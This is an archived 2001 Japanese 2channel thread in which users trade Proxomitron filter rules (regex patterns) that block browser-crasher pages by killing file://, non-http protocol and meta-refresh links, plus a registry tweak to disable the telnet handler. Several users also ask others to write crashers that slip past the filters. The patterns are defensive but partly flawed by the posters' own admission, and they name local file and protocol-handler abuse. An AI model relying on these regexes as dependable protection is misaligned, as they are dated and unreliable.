121 :101:01/10/01 16:05 ID:hw8QsaX.
>>103
>>110

どうもありがとうございました。
お礼が遅れて済みません。

ばっちり、回避できました!

122 :名無しさん@お腹いっぱい。:01/10/02 00:21 ID:6y350SSM
age

123 :名無しさん@お腹いっぱい。:01/10/02 10:22 ID:fP1JVSJk
>>91にもお礼言わないとな。
ありがとう。

124 :あげ:01/10/06 02:37 ID:HVuVSCuk
あげ

125 :名無しさん@お腹いっぱい。:01/10/06 11:12 ID:???
ローカルへのアクセスを完全に排除できる「Local File Access Killer」の改造方法決定版

Name = "Local File Access Killer"
Active = TRUE
Bounds = "<*>"
Limit = 2048
Match = "<[^>]++(file://|([a-z]|[A-Z]):(^//))*>"
Replace = "<!-- local file access denied -->"

126 :125:01/10/06 13:05 ID:???
スマソ。
125だとCSSまでマッチしてしまうんだった。
よって忘れてちょーだい。

127 :名無しさん@お腹いっぱい。:01/10/06 16:03 ID:SvhYjhNE
最近2chでよく見るウザいrefresh抑制フィルタ。

Name = "Anti-Auto-Refresher by X"
Active = TRUE
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv=("|)refresh*content = ("|) ([0-9.][0-9.]++)\2 (; url=("|)([^"'> ]++)\1["'> ]|) *"
Replace = "\2seconds-refresh to "<a href="\1">\1</a>" killed by proxomitron<br>"

128 :奈々氏:01/10/06 23:08 ID:???
カコイイ

129 :名無しさん@お腹いっぱい。:01/10/07 00:28 ID:Mn0gmbBU
Prottocol sur killer いじってみた
たぶんこれでfile mailto など大体防げると思う

Name = "Protocol src killer Cust"
Active = TRUE
Bounds = "<[^>]++src=*>|< link [^>]++ rel=("|) stylesheet*>|(< meta ([^>]++http-equiv=$AV(refresh)&[^>]++content=) [^>]++>)"
Limit = 2000
Match = "*(src|href|url)=$AV((^http(s|):)*:*)*"
Replace = "<!-- Protocol src killed -->\1"

130 :>127:01/10/07 08:07 ID:???
144.zipがあるぞ
ttp://www23.tok2.com/home/Proxomitron/uploader.cgi

131 :名無しさん@お腹いっぱい。:01/10/09 22:34 ID:NClxRpJM
有害スレage

132 :名無しさん@お腹いっぱい。:01/10/09 22:40 ID:???
>>131
どこが有害だ。
むしろ無害にしているかと。

133 :名無しさん@お腹いっぱい。:01/10/10 17:40 ID:???
>>131は厨房ブラクラ作者。

134 :名無しさん@お腹いっぱい。:01/10/11 19:36 ID:yaGRI3Sc
ああ!!
なんかごちゃごちゃしてもうどれを入れれば良いのか正直わからんよ。

135 :名無しさん@お腹いっぱい。:01/10/11 20:19 ID:v.KkGaAY
>>132
まず、>>129などのProtocol src killer は必ず入れること。
問題はブラウザのjavascriptを切るか切らないかの判断、そこが難しい。
切れば多くのブラクラを回避できるが、見られないページが多くなる。
切らなければプラクラ食らうのでproxomitronでの武装が必要。

136 :135:01/10/11 20:20 ID:???
>>132>>134

137 :134:01/10/11 20:38 ID:???
とりあえず既存のProtocol src killerと入れ替えたーよ。
テストしたいけどブラクラ踏む勇気無し(w
漏れが無いとは限らんし・・・
あ、java&java script&cookieは必要な時以外OFFです。
なのにブラクラ踏んだ事あったので鬱。
>>1でいきなりブラクラだったのには参りました・・・

138 :1:01/10/11 21:24 ID:???
>>137
をいをい…
正直、ブラクラと書いておけばよかったです。

139 :名無しさん@お腹いっぱい。:01/10/11 22:49 ID:???
>>134

>>125以外全部入れとけ。
別にブラクラ踏んでも何ともないよ。
心配ならHDに空のFDでも挿しとけ。

あとタイトルもきっちり見ておけ。

140 :名無しさん@お腹いっぱい。 :01/10/11 23:46 ID:1ZzmMZk2
各フィルタの優先度はどのようにしたらいい?

141 :名無しさん@お腹いっぱい。:01/10/12 00:50 ID:???
1.イメージチェッカー
2.イメージチェッカーアフター

あとは適当に。

142 :名無しさん@お腹いっぱい。:01/10/12 01:34 ID:???
>>139
デタラメに詰め込むと動作不良起こす場合もある。順番やMultiとの兼ね合いが難しい。
あと、proxomitron通過するブラクラなんて簡単に書けるぞ。
(2chで見かけるのが単純なものばかりだから助かってるだけ。)

143 :名無しさん@お腹いっぱい。:01/10/12 01:37 ID:???
>>142
踏んでみたいので書いてくださーい

144 :名無しさん@お腹いっぱい。:01/10/12 01:39 ID:???
>>142
おれも挑戦したい。お願いします。

145 :名無しさん@お腹いっぱい。:01/10/12 04:03 ID:lTuAv7Lo
ここ読んでみな >>143 & >>142

http://www.geocities.co.jp/Milano-Aoyama/3918/Proxomitron/pkiller.htm

きりがないな。

146 :名無しさん@お腹いっぱい。:01/10/12 11:23 ID:lOtEusSI
>>145
勉強になった。ありがとう

147 :名無しさん@お腹いっぱい。:01/10/13 18:53 ID:???
つーことで、ブラクラ回避の基本はview-source:ということですな。

まあ、文字コードに置き換えてまで作る奴は相当なアレだな。

148 :名無しさん@お腹いっぱい。:01/10/14 02:10 ID:???
>>145
こういうのはどうしてもいたちごっこになってしまうと言う事だな

149 :名無しさん@お腹いっぱい。:01/10/18 20:19 ID:7KF8/NdP
ブラクラ募集あげ

150 :名無しさん@お腹いっぱい。:01/10/19 02:49 ID:i4vjhHD+
>149
なんか、「Proxomitoronにブラクラで対抗するスレ」になってる感じ…

151 :名無しさん@お腹いっぱい。:01/10/19 08:01 ID:???
>>148
ブラクラを作る側やPopUpの広告を出しまくって資金を得ようとするweb運営者にとっては
厄介なものが出てきたというふうに感じてるんだろうね。

152 :名無しさん@お腹いっぱい。:01/10/19 16:15 ID:???
>>150
ワラタ!

153 :名無しさん@お腹いっぱい。:01/10/25 20:49 ID:JoPmTghG
>>145
いっそのことブラウザとtelnetの関連づけを切ってしまうってのはどう?
使い勝手は悪くなるけど安全だよ。

レジストリエディタで
HKEY_CLASSES_ROOT\telnet\shell\open\command
の中にある「rundll32.exe url.dll,TelnetProtocolHandler」などの
文字列をすべて削除してしまうか、\commandを「\_command」などに
リネームしてしまえばOK。

154 :名無しさん@お腹いっぱい。:01/10/25 23:31 ID:???
>>153
あれは例としてtelnetを出しているだけで、telnetさえ動かなければそれでいい
というものではないと思いますが。

155 :あぼーん:あぼーん
あぼーん

156 :名無しさん@お腹いっぱい。:01/10/26 03:38 ID:DZwmbmrn

誤爆?
でもこれヤバイんじゃねーの?

157 :名無しさん:01/10/26 07:59 ID:???
>>155 削除依頼出しておきましたよ。

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)